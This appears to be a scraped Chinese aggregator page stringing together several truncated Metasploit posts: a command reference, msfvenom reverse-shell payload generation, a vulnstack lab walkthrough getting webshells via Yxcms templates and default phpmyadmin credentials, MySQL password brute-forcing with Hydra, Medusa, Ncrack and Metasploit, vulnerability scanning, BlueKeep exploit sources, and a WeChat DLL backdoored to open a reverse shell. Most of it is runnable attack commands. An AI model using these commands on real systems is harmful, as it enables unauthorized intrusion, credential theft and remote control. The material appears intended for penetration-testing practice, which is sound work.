msf

MSF实验2

穿精又带淫゛_ 提交于 2019-12-04 18:26:25
MSFConsole是效率最高、功能最强大的高度集成的端界面之一,它便于渗透测试人员充分利用整个漏洞利用框架。 为方便操作将最常用的一些命令总结为下述表格 指令 描述 check 在不利用漏洞的前提下扫描(大部分不使用此命令) search string 通过模块名查询 show exploits 显示框架下所有漏洞程序 show payloads 显示所有平台下有效载荷 show encoders 显示可用的编码工具模板 show nops 显示所有可用的NOP生成程序 show options 显示指定模板的全部信息和选项信息 show targets 显示exploit支持的操作系统类型 show advanced 显示高级选项 connect IP 测试连通性指令 exploit 执行指定的exploit run 执行指定的auxiliary info module 显示指定模板的信息 use module 选择特定的渗透测试功能模板 set param value 设置当前模板参数 setg param value 设置全局参数 unset param 取消set设置,取消全部用unset all unsetg param 取消部分或全部全局设置 经测试发现本人的MSF工具不具备扫描漏洞的模块 所以不尝试做主机的漏洞扫描利用; 利用MS17-010,查询利用模块

MSF小记

青春壹個敷衍的年華 提交于 2019-12-04 15:23:10
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径 0x01 msfvenom命令参数: 1 Options: 2 -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all 4 -n, --nopsled <length> 为payload预先指定一个NOP滑动长度 5 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) 6 -e, --encoder [encoder] 指定需要使用的encoder(编码器) 7 -a, --arch <architecture>

从外网到域控(vulnstack靶机实战)

被刻印的时光 ゝ 提交于 2019-12-04 08:02:13
前言 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 话不多说,直接开搞.. 外网初探 打开页面后发现是一个Yxcms的站点,关于Yxcms的漏洞可以参考: https://www.freebuf.com/column/162886.html 然后找到后台,随手一个弱口令:admin、123456便进入了后台(实战中也有很多的站点是弱口令,只能说千里之堤溃于蚁穴) 关于Yx后台拿shell的方法还是很简单的,直接在新建模板哪里,将我们的一句话木马添加进去就ok了 比如这样 此时我们连接index.php即可获得shell 此时呢,我们先不往下进行,既然是靶机,我们就应该多去尝试一下发掘它其他的漏洞,蚁剑连接以后可以发现这是一个phpstudy搭建的网站,那么按照经验我们知道应该会有默认的phpmyadmin在,我们尝试访问: 发现猜测的没错,那么默认密码呢,root、root发现竟然也进去了,那么就来复习一下phpmyadmin后台getshell吧。phpmyadmin后台getshell一般有以下几种方式: 1、select into outfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getsehll 4

破解MySQL登录密码的几种方法

时光毁灭记忆、已成空白 提交于 2019-12-04 06:44:57
工具列表 Medusa Ncrack Hydra Metasploit Medusa medusa -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql Ncrack ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306 Hydra hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 mysql Metasploit msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > set rhosts 192.168.1.106 msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt msf auxiliary(mysql_login) > set stop_on_success true

metasploit漏洞扫描

[亡魂溺海] 提交于 2019-12-03 23:12:36
1.常用普通功能 db_destory //删除数据库 nc ip port //获取基本系统信息 #### 2.nexpose 连接数据库 load nexpose //载入nexpose插件 msf > help msf > nexpose_connect -h //查看连接nexpose需要的参数 msf >nexpose_connect 用户名:密码 ip地址 ok——登录到nexpose msf >nexpose_scan //开始扫描 msf > db_hosts -c adress //安地址分类查看结果 msf >db_vulns //查看详细信息 #### 3.nessus msf >load nessus msf >nessus_help msf >nessus_policy_list //查看扫描选项 msf >nessus_sacn_new 选项号 任务名字 IP地址 msf >nessus_scan_status //扫描状态 msf >nessus_report_list //所有扫描结果报告 msf >nessus_report_get ID号 //下载某个报告 4.其他 vnc无密码扫描 msf > use auxiliary/scanner/vnc/vnc_none_auth x11无密码扫描 msf > use auxiliary/x11

CVE-2019-0708漏洞复现及采坑记

天大地大妈咪最大 提交于 2019-12-03 20:50:46
经历了很多次失败、蓝屏之后,终于找到了稳定复现的方法。 虚拟化软件 :VMware Workstation 操作系统 :Windows 7 旗舰版 6.1.7601 Service Pack 1 Build 7601,官方镜像初始化安装后未安装任何安全补丁。 虚拟机配置 :内存2GB、处理器1个、每个处理器的内核数量1个 实验步骤 第一步 :从GitHub下载4个*.rb脚本 https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp

渗透测试工具实战技巧合集

吃可爱长大的小学妹 提交于 2019-12-03 16:59:48
最好的 NMAP 扫描策略 Nmap – 躲避防火墙 Nmap 进行 Web 漏洞扫描 使用 DIRB 爆破目录 注:DIRB 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑等等。 Patator – 全能暴力破解测试工具 使用 Fierce 爆破 DNS 注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:subDomainsBrute 和 SubBrute 等等 使用 Nikto 扫描 Web 服务 扫描 WordPress HTTP 指纹识别 使用 Skipfish 扫描 注:Skipfish 是一款 Web 应用安全侦查工具,Skipfish 会利用递归爬虫和基于字典的探针生成一幅交互式网站地图,最终生成的地图会在通过安全检查后输出。 使用 NC 扫描 Unicornscan 注:Unicornscan 是一个信息收集和安全审计的工具。 使用 Xprobe2 识别操作系统指纹 枚举 Samba 实用的 Windows cmd 命令 PuTTY 连接隧道 Meterpreter 端口转发 开启 RDP 服务 关闭 Windows 防火墙 Meterpreter VNC

What is the difference between microsoft visual studio scrum 2.0 vs MSF for Agile Software Development 6.0

烈酒焚心 提交于 2019-12-03 11:06:49
问题 What is the difference between Microsoft Visual Studio Scrum 2.0 vs MSF for Agile Software Development 6.0. I am looking to get feedback on what is the best template to use for Visual Studio and TFS for agile development. I was mostly wondering if anyone can tell me the difference between the two latest templates in Visual Studio. 回答1: The scrum template has been created specifically to follow the scrum process and terminology as closely as possible and was built as a collaborative effort

What is the difference between microsoft visual studio scrum 2.0 vs MSF for Agile Software Development 6.0

坚强是说给别人听的谎言 提交于 2019-12-03 02:36:37
What is the difference between Microsoft Visual Studio Scrum 2.0 vs MSF for Agile Software Development 6.0. I am looking to get feedback on what is the best template to use for Visual Studio and TFS for agile development. I was mostly wondering if anyone can tell me the difference between the two latest templates in Visual Studio. jessehouwing The scrum template has been created specifically to follow the scrum process and terminology as closely as possible and was built as a collaborative effort between Microsoft and scrum.org. The MSF for agile template was originally created as a generic

2019.10.9wechat反弹shell复现

浪尽此生 提交于 2019-12-03 01:26:48
./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137 msfconsle 打开 msf 在 msf 中 use exploit/multi/handler set payload windows/shell_reverse_tcp show options 查看配置 set lhost 和 lport exploit windows7 替换 dll 文件 , 打开微信 kali 接收到反弹的 shell 来源: https://www.cnblogs.com/shuihanhhhh/p/11769179.html